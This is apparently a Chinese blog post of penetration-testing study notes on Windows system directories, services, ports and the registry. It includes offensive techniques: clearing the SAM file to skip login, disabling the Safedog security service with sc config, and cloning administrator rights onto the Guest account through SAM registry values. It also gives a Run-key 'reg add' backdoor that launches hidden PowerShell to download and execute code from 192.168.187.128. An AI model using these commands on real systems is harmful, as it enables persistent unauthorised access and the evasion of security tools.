首页 > 其他分享 >0x08.系统目录、服务、端口、注册表

0x08.系统目录、服务、端口、注册表

时间:2023-12-14 16:14:27浏览次数:32  
标签:0x08 根键 Windows HKEY ----- 注册表 服务 80 系统目录

系统目录

  • C:\Windows\System32这个目录很重要

  • C:\Windows\System32\config\SAM

    计算机的账号密码由sam记录,清空sam就不需要账号密码,直接登录。实战中先进PE复制一份初始的sam,然后再清空,清空后进入系统,操作完之后,再把原始的sam粘贴回去

  • C:\Windows\System32\drivers\etc\hosts

  • C:\Users

    创建用户之后,会在该文件夹下留下配置信息,而且删不掉,所以尽量不要去创建

​ 用管理员的账号密码去登录,访问桌面,会得到更多信息。

  • C:\Users\Administrator\Documents

    可能会有日常文件

  • C:\ProgramData

    c盘下的隐藏文件,因为里面的文件是开机自启动。病毒经常感染这个文件,杀毒时重点杀这个文件

服务

  • 本地服务:在这台计算机上进行启动的一些服务
  • 网络服务:IIS、DNS、SAM、SMB、FTP等都能通过网络ip访问

  • 查看所有启动服务:net start

  • 服务的启动和停止

​ win+r,输入services.msc,打开服务。操作的是服务名称,不是显示名称

​ 比如对服务进行停止,如果使用显示名称,需要加双引号

net stop "服务显示名称"
net stop 服务名称
net start 显示的是服务显示名称,需要将里面的用双引号包裹

  • 安全狗绕过思路

    先将安全狗的服务禁用掉,然后再重启计算机。

    禁用命令:sc config "safedog center guarder" start= disable,这里的服务要写服务名称,不能写服务显示名称,start=后面要加空格


端口

  • 区分服务
  • 端口不能重复使用
    • 也有复用的情况:目标内网80端口映射到公网的80,且开启了3389,但是不出网。这时候可以将3389加在80上,这样就能通过公网访问到
  • 范围:1-65535,1-1024分给了系统自带的服务
  • 木马一般使用高位端口

目标情况:内网的80端口映射到了公网的80,并且开启了3389,但是不出网

方案一:端口复用

将3389端口加在80上,这样就能通过公网访问到。需要用到端口复用的工具,可能会不兼容

方案二:http隧道

本地生成好隧道,把马上传到目标服务器上,然后通过公网ip连接马。走的是80端口和马建立的隧道,通过隧道连接内网的3389


  • 常见端口

    HTTP----->80
    HTTPS----->443
    FTP----->20,21
    SSh----->22
    telnet----->23
    SMTP----->25
    SMB----->445
    RDP----->3389
    QQ----->1080
    tomcat----->8080
    mysql----->3306
    sqlserver----->1433
    oracle----->1521
    redis----->6379
    

注册表

系统的识别是通过注册表的值进行调用,或者UID号。windows的管理员UID是500,LINUX的管理员UID号是0

1.HKEY_CLASSES_ROOT
• 管理文件系统。根据在 Windows 中安装的应用程序的扩展名 , 该根键指明其文件类型的名称,相应打开该文件所要
调用的程序等等信息。
2.HKEY_CURRENT_USER
管理系统当前的用户信息。在这个根键中保存了本地计算机中存放的当前登录的用户信息 , 包括用户登录用户名
和暂存的密码。在用户登录 Windows 98 时,其信息从 HKEY_USERS 中相应的项拷贝到 HKEY_CURRENT_USER 中。
3.HKEY_LOCAL_MACHINE
• 管理当前系统硬件配置。在根键这个中保存了本地计算机硬件配置数据 , 此根键下的子关键字包括在 SYSTEM.DAT 中 ,
用来提供 HKEY_LOCAL_MACHINE 所需的信息 , 或者在远程计算机中可访问的一组键中。
• 这个根键里面的许多子键与 System.ini 文件中设置项类似。
4.HKEY_USERS
• 管理系统的用户信息。在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表。同时每个用户的预
配置信息都存储在 HKEY_USERS 根键中。 HKEY_USERS 是远程计算机中访问的根键之一。
5.HKEY_CURRENT_CONFIG
• 管理当前用户的系统配置。在这个根键中保存着定义当前用户桌面配置 ( 如显示器等等 ) 的数据 , 该用户使用过的文档
列表( MRU ),应用程序配置和其他有关当前用户的 Windows 98 中文版的安装的信息。

注册表的使用

  • 隐藏后门

  • 克隆账号密码权限

    输入regedit,打开注册表,一开始SAM表没有读取权限,对二级目录的sam进行权限修改

将管理员的权限进行修改,给管理员完全控制权限,修改成完全控制,重新打开

01F4对应的是管理员,01F5对应的是普通用户

思路是将管理员的F值替换到普通用户的F值中,这个时候guest就有了管理员权限

操作完之后要把权限恢复

  • 读取服务密码

  • 查询开机启动程序

    • 第一种思路

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run这里是开机自启动项,如果exe能过免杀,可以在这里添加一个字符串值

  • 第二种思路

    使用下面的cmd命令,执行完之后,并不会出现在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run里面,而是在HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Key1names" /t REG_SZ /d "cmd /c start powershell.exe -nop -w hidden -c \ "IEX((new-object
net.webclient).downloadstring('http://192.168.187.128:80/a'))\""/f
远程从192.168.187.128下载,system权限的后门

或者
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Key1names" /t REG_SZ /d "cmd /c start c:\windows\system32\keysx.exe" /f
只要这个exe能免杀,将它添加到了开机自启动项
  • 第三种思路,开始---->启动,也会开机自启动

>

远程桌面

这个操作能直接将自己的文件粘贴到对方的电脑里面,但是会将自己的磁盘映射到对方的电脑上。如果对方是蜜罐的话,这个操作很危险。建议使用虚拟机

  • 计算机属性,勾选第二个

  • 使用2012连接08的,勾选驱动器

  • 可以直接将12的文件粘贴到08上

  • 12的磁盘会映射到08上,非常危险

  • 08的3389会连接到12上

绕过

执行命令可能会有一些截断的问题,将它保存成批处理的文件

bypass执行:powershell -exec bypass .\b.psl

标签:0x08,根键,Windows,HKEY,-----,注册表,服务,80,系统目录
From: https://www.cnblogs.com/garliccc/p/17901378.html

相关文章

  • Qt - 操作注册表
    一、写入注册表#include<QSettings>//实例QSettings//参数1:注册表位置//参数2:操作windows注册表QSettings::NativeFormat//说明:QSettings::IniFormat读写ini格式的配置文件,前面用过。QSettings*reg=newQSettings("HKEY_CURRENT_USER\\Software\\Qt01",QSett......
  • 6.8 Windows驱动开发:内核枚举Registry注册表回调
    在笔者上一篇文章《内核枚举LoadImage映像回调》中LyShark教大家实现了枚举系统回调中的LoadImage通知消息,本章将实现对Registry注册表通知消息的枚举,与LoadImage消息不同Registry消息不需要解密只要找到CallbackListHead消息回调链表头并解析为_CM_NOTIFY_ENTRY结构即可实现枚举......
  • 7.5 Windows驱动开发:监控Register注册表回调
    在笔者前一篇文章《内核枚举Registry注册表回调》中实现了对注册表的枚举,本章将实现对注册表的监控,不同于32位系统在64位系统中,微软为我们提供了两个针对注册表的专用内核监控函数,通过这两个函数可以在不劫持内核API的前提下实现对注册表增加,删除,创建等事件的有效监控,注册表监视通......
  • C/C++ 实现Windows注册表操作
    Windows注册表(Registry)是Windows操作系统中用于存储系统配置信息、用户设置和应用程序数据的一个集中式数据库。它是一个层次结构的数据库,由键(Key)和值(Value)组成,这些键和值被用于存储各种系统和应用程序的配置信息。以下是注册表的一些基本概念:键(Key):注册表中的数据结构,类似于文......
  • 8.5 Windows驱动开发:内核注册表增删改查
    注册表是Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息,注册表是一个巨大的树形结构,无论在应用层还是内核层操作注册表都有独立的API函数可以使用,而在内核中读写注册表则需要使用内核装用API函数,如下将依次介绍并封装一些案例,实现对注册表的创建,删除,更新,查询等操作......
  • win10注册表的备份与恢复;对“未将所有数据都成功写入到注册表中。某些项是由系统或其
    为什么要备份注册表呢?现在网络上的软件下载渠道良莠不齐,一不小心就给你一个全家桶服务,而仅仅是通过控制面板将它们卸载是删不干净的,鬼知道它们在电脑的注册表上留下了什么。所以在从不知名网站下载一些软件之前,对注册表进行备份,若出了什么问题,事后对注册表进行恢复是最便捷的方式了......
  • 优盘 注册表
    1、运行REGEDIT,2、展开HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet,3、右击Control项,选择新建,重命名新建项为WriteProtect,并设置其值为00000001(十六进制),然后刷新即可.4、若要取消对闪存写保护的限制,将值改为00000000即可. 2. 禁用U盘:1、运行REGEDIT,2、展开HKEY_LO......
  • 部分软件注册表记录
    UltraEdit点击查看代码WindowsRegistryEditorVersion5.00[HKEY_CLASSES_ROOT\*\shell\Uedit32]@="Uedit32(&U)""Icon"="E:\\Soft\\Edit\\UltraEdit18\\Uedit32.exe"[HKEY_CLASSES_ROOT\*\shell\Uedit32\command]@=&......
  • 2023-11-07 如何删除navicat 注册表
    注:我只删掉了Registration12XCS,其它没有删,我怕给pc整崩了。1.win+r打开运行窗口并输入regedit: 2.找到路径:计算机\HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\NavicatPremium\Registration12XCS 删除Registration12XCS,如果有Update也一并删除,3.再开路径:计算机\HKEY_CURREN......
  • 计算机配置 — 管理模板 — Windows 组件 — 数据收集和预览版本 对应 注册表 位置
    @echooff::切换对预览体验成员内部版本的用户控制regadd"HKLM\SOFTWARE\Policies\Microsoft\WindowsPreviewBuilds"/vAllowBuildPreview/tREG_DWORD/d1/f::允许商业数据管道regadd"HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection"/vCommerc......